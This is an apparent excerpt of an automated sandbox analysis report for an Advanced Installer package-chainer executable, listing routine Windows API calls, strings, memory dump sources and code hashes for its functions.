                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$DeleteDirectoryFileRemove
                                          • String ID: p1Wu
                                          • API String ID: 50330452-3125263879
                                          • Opcode ID: b90d3084f0a5c2810907c23650859721cf32e72e5fdf6718e86b1cde894a96eb
                                          • Instruction ID: 1589f9ef57bbe8af24023dd020fef3a025227ee8b5647dcd5f17b11986e4a59f
                                          • Opcode Fuzzy Hash: b90d3084f0a5c2810907c23650859721cf32e72e5fdf6718e86b1cde894a96eb
                                          • Instruction Fuzzy Hash: 33519D71A00219CFDF14CFA4D898BEEBBF1EF05304F154069E915AB252DB35AA08DFA1
                                          APIs
                                          • RegCloseKey.ADVAPI32(00000000,D11C52E5), ref: 000A5176
                                          • _wcsrchr.LIBVCRUNTIME ref: 000A51A0
                                          • RegQueryValueExW.ADVAPI32(00000000,0010DBD4,00000000,00000000,00000000,00000000,0010DBD4,00000001,?,00000000,00000000), ref: 000A5223
                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000A526F
                                            • Part of subcall function 000A5020: RegOpenKeyExW.ADVAPI32(00000000,D11C52E5,00000000,00020019,00000002,D11C52E5,00000001,00000010,00000002,000A436C,D11C52E5,00000000,00000000), ref: 000A50BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Close$OpenQueryValue_wcsrchr
                                          • String ID: hu
                                          • API String ID: 213811329-423011080
                                          • Opcode ID: 6312ade8ffdf4fe47aa4cebf523b430cf6f193af3434dd09ae6d5e38cab43a93
                                          • Instruction ID: 2316bbff7047530a661e68aa82eff31934c97ef6b4433b401ba10df73449c430
                                          • Opcode Fuzzy Hash: 6312ade8ffdf4fe47aa4cebf523b430cf6f193af3434dd09ae6d5e38cab43a93
                                          • Instruction Fuzzy Hash: 1851F071905749AFDB10CFA8DD48BAEBBB4FF46320F14826AE815A73C1D7759A04CB90
                                          APIs
                                          • FlushFileBuffers.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 000AC428
                                          • GetFileSize.KERNEL32(?,00000000,?,00000000), ref: 000AC438
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushHeapProcessSize
                                          • String ID: FTP Server$HTTP/1.0$Local Network Server
                                          • API String ID: 3404093814-2627868275
                                          • Opcode ID: d8a5cfbd4fba6825b995273699da75b7ee1563e821d4b6748a2f3dc6a9dd4b64
                                          • Instruction ID: fdb2d12570dd799d4d27e374a601b19e00c5c917d9de1b126e911012e548200c
                                          • Opcode Fuzzy Hash: d8a5cfbd4fba6825b995273699da75b7ee1563e821d4b6748a2f3dc6a9dd4b64
                                          • Instruction Fuzzy Hash: BD315C71A00249AFDB10CF68C844BAABBE8FF09320F11866AF925D7291D774DE10CB91
                                          APIs
                                          • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00074822
                                          • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00074828
                                          • GetErrorInfo.OLEAUT32(00000000,00000000), ref: 0007485A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressErrorInfoLibraryLoadProc
                                          • String ID: RoOriginateLanguageException$combase.dll
                                          • API String ID: 1186719886-3996158991
                                          • Opcode ID: fec40373d6d7a15ce6cdab78045602cb8a29196814e20fbebf6dc804baa76458
                                          • Instruction ID: d650619ee6b31dcf74423efbd20f5c4eff5da6da139fba93d3486972380cf8ec
                                          • Opcode Fuzzy Hash: fec40373d6d7a15ce6cdab78045602cb8a29196814e20fbebf6dc804baa76458
                                          • Instruction Fuzzy Hash: B2315971D04249AFDB60DFA8D946BEEBBF4EB04310F104629E414A72D1DBB85A44CB96
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D11C52E5,?,?,00000000,000FD075,000000FF,?,000DAA57,?,?,000DAA2B,?), ref: 000DAAFC
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000DAB0E
                                          • FreeLibrary.KERNEL32(00000000,?,00000000,000FD075,000000FF,?,000DAA57,?,?,000DAA2B,?), ref: 000DAB30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 14eb1954e0a1b43e9450dfbc13f6910a9e8b5fb2e9322208658daded06711765
                                          • Instruction ID: dbe8e780a9c91b5cfcfe640fb3163efd000586f276fee5ca41b8b10c9853de28
                                          • Opcode Fuzzy Hash: 14eb1954e0a1b43e9450dfbc13f6910a9e8b5fb2e9322208658daded06711765
                                          • Instruction Fuzzy Hash: 33016731A04659BFDB119F54CC09FBE7BF9FB04711F004526F911A26E0DBB89941CA54
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 000B01A6
                                          • IsWindowVisible.USER32(?), ref: 000B01F1
                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 000B0207
                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 000B040C
                                          • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 000B041D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$LongRedrawVisible
                                          • String ID:
                                          • API String ID: 554559110-0
                                          • Opcode ID: 14bdf3f394d837f799a89748c2357f2e53b1c5486b894f19b1b42e9441cf09ba
                                          • Instruction ID: 5ca54fc032dffb9135400d6daec22dde6f031f4e6e0cfb1bc762ea95d6da2533
                                          • Opcode Fuzzy Hash: 14bdf3f394d837f799a89748c2357f2e53b1c5486b894f19b1b42e9441cf09ba
                                          • Instruction Fuzzy Hash: 50815671A087119FD714CF18C884A9BFBE6FF88710F15891EF999A72A0D771E940CB82
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 000DFD99
                                          • __alloca_probe_16.LIBCMT ref: 000DFE5A
                                          • __freea.LIBCMT ref: 000DFEC1
                                            • Part of subcall function 000DD733: HeapAlloc.KERNEL32(00000000,00000000,000DB467,?,000DFC0B,?,00000000,?,000D7441,00000000,000DB467,00000000,?,?,?,000DB261), ref: 000DD765
                                          • __freea.LIBCMT ref: 000DFED6
                                          • __freea.LIBCMT ref: 000DFEE6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                          • String ID:
                                          • API String ID: 1096550386-0
                                          • Opcode ID: c20e8191d78e8f04356759663513bd5382401ef66bddf7252c2948eb58886255
                                          • Instruction ID: 99b31c2455bcdd69231bf8630f840c03000ce30e707689f66030d887c837dd72
                                          • Opcode Fuzzy Hash: c20e8191d78e8f04356759663513bd5382401ef66bddf7252c2948eb58886255
                                          • Instruction Fuzzy Hash: DB518E72600317AFEB219F64DC41EFF77A9EB44350B19813AFD0AD6262EA70CC5096B0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 27303f4252ee3363573543187dd0bec278ee43734e397a53ec3b625fd0bb7c58
                                          • Instruction ID: f8948a666b90b57abe07c8bcb1fdb00c12df5ba6103951913ba204c87e77e918
                                          • Opcode Fuzzy Hash: 27303f4252ee3363573543187dd0bec278ee43734e397a53ec3b625fd0bb7c58
                                          • Instruction Fuzzy Hash: D4817F71900245EFEB10CFA8C948B9EBFF5FF49324F158268E915AB392DB758940CB91
                                          APIs
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,D11C52E5,?,?,00000000,?,?,?,00000000,000F909D,000000FF,?,00095CD7), ref: 000A6E40
                                          • CreateThread.KERNEL32(00000000,00000000,000A71B0,?,00000000,00000000), ref: 000A6E76
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 000A6F80
                                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 000A6F8B
                                          • CloseHandle.KERNEL32(00000000), ref: 000A6FAB
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
                                          • String ID:
                                          • API String ID: 978852114-0
                                          • Opcode ID: b771c0a338d723a2b5b84c777ba1a87ce38157bd8eb20ad0492a7d85960b899d
                                          • Instruction ID: e632529f15943b4c83153037a34513e5b6af4512756cfd14a95b122edc863afe
                                          • Opcode Fuzzy Hash: b771c0a338d723a2b5b84c777ba1a87ce38157bd8eb20ad0492a7d85960b899d
                                          • Instruction Fuzzy Hash: DC516B75A00709DFCB20CFA8D984BAABBF4FF49310F244669F916A77A1D731A840CB50
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • SetWindowTextW.USER32(00000000,000FA9B5), ref: 000AFABF
                                          • GetDlgItem.USER32(00000000,0000042B), ref: 000AFB17
                                          • SetWindowTextW.USER32(00000000,00000000), ref: 000AFB1E
                                          • GetDlgItem.USER32(?,00000001), ref: 000AFB2B
                                          • EnableWindow.USER32(00000000,00000000), ref: 000AFB30
                                            • Part of subcall function 00098930: GetWindowLongW.USER32(?,000000F0), ref: 00098977
                                            • Part of subcall function 00098930: GetParent.USER32(00000000), ref: 0009898A
                                            • Part of subcall function 00098930: GetWindowRect.USER32(?,?), ref: 000989AB
                                            • Part of subcall function 00098930: GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
                                            • Part of subcall function 00098930: MonitorFromWindow.USER32(?,00000002), ref: 000989D6
                                            • Part of subcall function 00098930: GetMonitorInfoW.USER32(00000000,?), ref: 000989EC
                                            • Part of subcall function 000AFD00: GetWindowLongW.USER32(?,000000F0), ref: 000AFD2D
                                            • Part of subcall function 000AFD00: GetWindowLongW.USER32(?,000000F0), ref: 000AFD42
                                            • Part of subcall function 000AFD00: SetWindowLongW.USER32(?,000000F0,00000000), ref: 000AFD59
                                            • Part of subcall function 000AFD00: GetWindowLongW.USER32(?,000000EC), ref: 000AFD72
                                            • Part of subcall function 000AFD00: SetWindowLongW.USER32(?,000000EC,00000000), ref: 000AFD86
                                            • Part of subcall function 000AFD00: SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 000AFD94
                                            • Part of subcall function 000AFD00: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000AFDA7
                                            • Part of subcall function 000AFD00: IsWindow.USER32(00000000), ref: 000AFDC2
                                            • Part of subcall function 000AFD00: DestroyWindow.USER32(00000000), ref: 000AFDDE
                                            • Part of subcall function 000AFD00: GetClientRect.USER32(?,?), ref: 000AFE36
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$ItemMessageMonitorRectSendText$ClientDestroyEnableFromHeapInfoParentProcess
                                          • String ID:
                                          • API String ID: 442920686-0
                                          • Opcode ID: caec2dd3f9e9ed5af007952718248e122f8f138634b56c4ae963d94e24da1355
                                          • Instruction ID: 34ba9f9befd290c97af754ebce27ffa459c280c163a5a812b5cd5f6fc8f5929d
                                          • Opcode Fuzzy Hash: caec2dd3f9e9ed5af007952718248e122f8f138634b56c4ae963d94e24da1355
                                          • Instruction Fuzzy Hash: 04518E319016099FDB10DBA8CC48BAEBBB5FF49310F148269E4159B2A2DB349D05CB91
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 000CB613
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 000CB61D
                                            • Part of subcall function 000692C0: std::_Lockit::_Lockit.LIBCPMT ref: 000692F0
                                            • Part of subcall function 000692C0: std::_Lockit::~_Lockit.LIBCPMT ref: 00069318
                                          • codecvt.LIBCPMT ref: 000CB657
                                          • std::_Facet_Register.LIBCPMT ref: 000CB66E
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 000CB68E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                          • String ID:
                                          • API String ID: 712880209-0
                                          • Opcode ID: 5a5e0897299c3c715524dd359057064412ac4ebcd16a57b262a1c6d5f3a548b8
                                          • Instruction ID: c6e4087f333691b686d3567e048759ed1ba8e96bd3718f1d27cbc9a101dbdda1
                                          • Opcode Fuzzy Hash: 5a5e0897299c3c715524dd359057064412ac4ebcd16a57b262a1c6d5f3a548b8
                                          • Instruction Fuzzy Hash: B321F676A00119ABCB11EFA4D882FEEB7B9BF44320F14451EF805AB292DF749D05C791
                                          APIs
                                          • EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
                                          • LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
                                          • RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3
                                          • SetEvent.KERNEL32(?,001298D8,000FD280), ref: 000CC8AD
                                          • ResetEvent.KERNEL32(?,001298D8,000FD280), ref: 000CC8B9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                          • String ID:
                                          • API String ID: 3916383385-0
                                          • Opcode ID: c570b51f5c9f9a55f2456ebacef031eb66c0426f68af69522881a4e74155e547
                                          • Instruction ID: c4acbfe163f820354c1ad5edf1b618007aa3e80f315196edf0b135dbea80cd0f
                                          • Opcode Fuzzy Hash: c570b51f5c9f9a55f2456ebacef031eb66c0426f68af69522881a4e74155e547
                                          • Instruction Fuzzy Hash: BF018171905160EFD725AF18FD48DAA3BAAFB097107010469FA0593BB0CB341C92EFD8
                                          APIs
                                            • Part of subcall function 0008D5C0: SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,00129AFC), ref: 0008D5D0
                                            • Part of subcall function 0008D5C0: LoadLibraryW.KERNEL32(Shell32.dll,?,?,00129AFC), ref: 0008D5E3
                                            • Part of subcall function 0008D5C0: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0008D5F3
                                          • PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,00129AFC), ref: 00089368
                                            • Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressAllocateExistsFileFolderHeapLibraryLoadLocationPathProcSpecial
                                          • String ID: ADVINST_LOGS$Everyone
                                          • API String ID: 3321256476-3921853867
                                          • Opcode ID: b528943ecb67d0c5a566836e3681ae61b73ca012211557adda5a81d40a111a60
                                          • Instruction ID: 1e0bcf7d7dd73b237c670ea297d8447453f22f9178a259611f8f7397edf507dd
                                          • Opcode Fuzzy Hash: b528943ecb67d0c5a566836e3681ae61b73ca012211557adda5a81d40a111a60
                                          • Instruction Fuzzy Hash: 3891BCB1901609DFDB10EFA8C949BEEB7F4BF14314F284158E946AB2D2DB355E05CBA0
                                          APIs
                                          • PathIsUNCW.SHLWAPI(?,?,?,?,D11C52E5,?,?), ref: 00082281
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Path
                                          • String ID: *.*$\\?\$\\?\UNC\
                                          • API String ID: 2875597873-1700010636
                                          • Opcode ID: 42cbc1a414ebe8ca46aea321c7826d93e0cb6c01a30ae608662f569a807686f3
                                          • Instruction ID: 3319a0cd54e58bf7d0962c4dd7bd3bcf4c552027673140490f5eb1abc2598168
                                          • Opcode Fuzzy Hash: 42cbc1a414ebe8ca46aea321c7826d93e0cb6c01a30ae608662f569a807686f3
                                          • Instruction Fuzzy Hash: 8E81E171A00605DFDB10EF68C859BAEF7F6FF54324F108268E554DB292DB75AA40CB90
                                          APIs
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,000AB107,00000000,.part,00000005,?,?,?,D11C52E5), ref: 000AC00D
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,000AB107,00000000,.part,00000005,?,?,?,D11C52E5), ref: 000AC02E
                                          • GetLastError.KERNEL32(000AB107,00000000,.part,00000005,?,?,?,D11C52E5), ref: 000AC08E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CreateEvent$ErrorLast
                                          • String ID: AdvancedInstaller
                                          • API String ID: 1131763895-1372594473
                                          • Opcode ID: 4700b51f1cbb4e8eb6fce30b5f73c1397bf28428f3cbde15b0398f23653fd63b
                                          • Instruction ID: 5266bfac2f0fa40bc03d2a4e4a5a88374ed2600be66f3a9a534eff132342f2c0
                                          • Opcode Fuzzy Hash: 4700b51f1cbb4e8eb6fce30b5f73c1397bf28428f3cbde15b0398f23653fd63b
                                          • Instruction Fuzzy Hash: F6115B71340742FBE720DB64CC89F6ABBA5FB94705F214424F6059B690DBB1B851CB94
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: String$Free
                                          • String ID: P?5w
                                          • API String ID: 1391021980-2838385722
                                          • Opcode ID: 1f87d48bf3f5ade38f3e28346d2e2263094354bfd1e35acf184e397db7d70538
                                          • Instruction ID: 658ad1bef6a26cd0db1d6e85f3e725b4fa5f6a5bcbbe4bff9779620a43812bc1
                                          • Opcode Fuzzy Hash: 1f87d48bf3f5ade38f3e28346d2e2263094354bfd1e35acf184e397db7d70538
                                          • Instruction Fuzzy Hash: 19014B76904245EFE7208F58DD05B6ABBECEF04710F10066AF851936A0EB7A5900DA40
                                          APIs
                                            • Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
                                            • Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881
                                          • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00089E6E
                                          • GetProcAddress.KERNEL32(00000000), ref: 00089E75
                                            • Part of subcall function 000CC7EF: EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
                                            • Part of subcall function 000CC7EF: LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
                                            • Part of subcall function 000CC7EF: RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$AddressConditionLibraryLoadProcVariableWake
                                          • String ID: Dbghelp.dll$SymFromAddr
                                          • API String ID: 3620240239-642441706
